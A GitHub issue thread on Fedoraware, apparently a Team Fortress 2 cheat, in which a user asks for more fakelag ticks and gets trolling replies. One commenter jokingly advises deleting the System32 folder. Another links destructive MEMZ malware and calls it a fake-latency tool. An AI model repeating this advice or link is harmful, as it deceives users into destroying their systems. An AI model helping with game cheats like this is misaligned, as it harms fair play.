### ISSUE TITLE
Fakelag

### ISSUE THREAD

**Issue by GabrielNiccola** [tf2cheater2013/Fedoraware#192]
hi I wanted you to increase the fakelag tick to 27

**Comment by GabrielNiccola** [comment]
why do you close?

**Comment by johnathon-walnut** [comment]
Not possible.

**Comment by gayblackirony** [comment]
ctrl + mouse1 on the slider

**Comment by johnathon-walnut** [comment]
Still wont do more than 22 due to another thing.

**Comment by GabrielNiccola** [comment]
How can you not increase the fakelag tick to 27?

**Comment by johnathon-walnut** [comment]
Because it doesn't work. Why specifically 27???

**Comment by GabrielNiccola** [comment]
if you can't increase it to 27 then increase it to 23

**Comment by johnathon-walnut** [comment]
Are you a troll?

**Comment by GabrielNiccola** [comment]
No

**Comment by gayblackirony** [comment]
why 23 ticks

**Comment by johnathon-walnut** [comment]
So why are you suggesting ridiculous things...

**Comment by johnathon-walnut** [comment]
You can do 22 max.

**Comment by GabrielNiccola** [comment]
Can you remove the auto backstab key at least?

**Comment by gayblackirony** [comment]
JUST UNBIND IT

**Comment by GabrielNiccola** [comment]
BUT HOW DO I DO THAT?

**Comment by gayblackirony** [comment]
CLICK ON KEY AND PRESS ESC

**Comment by GabrielNiccola** [comment]
does this really work?

**Comment by wizardmanperson** [comment]
yes

**Comment by gayblackirony** [comment]
YES

**Comment by GabrielNiccola** [comment]
but if I do that I need to press esc or does it automatically?

**Comment by gayblackirony** [comment]
YES IT DOES EVERYTHING AUTOMATICALLY, NO NEED TO HODL ANYTIHEATHAERTNIEG

**Comment by gayblackirony** [comment]
MAY ALLAH HELP YOU..

**Comment by GabrielNiccola** [comment]
Thanks

**Comment by j4kst3r** [comment]
Gabriel U should find the System32 folder and delete it, it allows u to have 27 ticks of fakelag

**Comment by GabrielNiccola** [comment]
you do it

**Comment by j4kst3r** [comment]
why? i have my 27 ticks of fakelag already

**Comment by GabrielNiccola** [comment]
Did you know that there is a way to have fake latency and just download it and you will have https://github.com/bill-zhanxg/MEMZ_Destructive_Clean-Download

**Comment by gayblackirony** [comment]
thanks

**Comment by wizardmanperson** [comment]
wow amazing

**Comment by j4kst3r** [comment]
I don't need fake latency, I just set my cl_ping to 1000 and it does fake latency.

**Comment by GabrielNiccola** [comment]
I bet my password that this command does not exist the only command that changes ping and cl_interp 5 or 0.5

**Comment by johnathon-walnut** [comment]
@xxmyn ban this guy from making issues
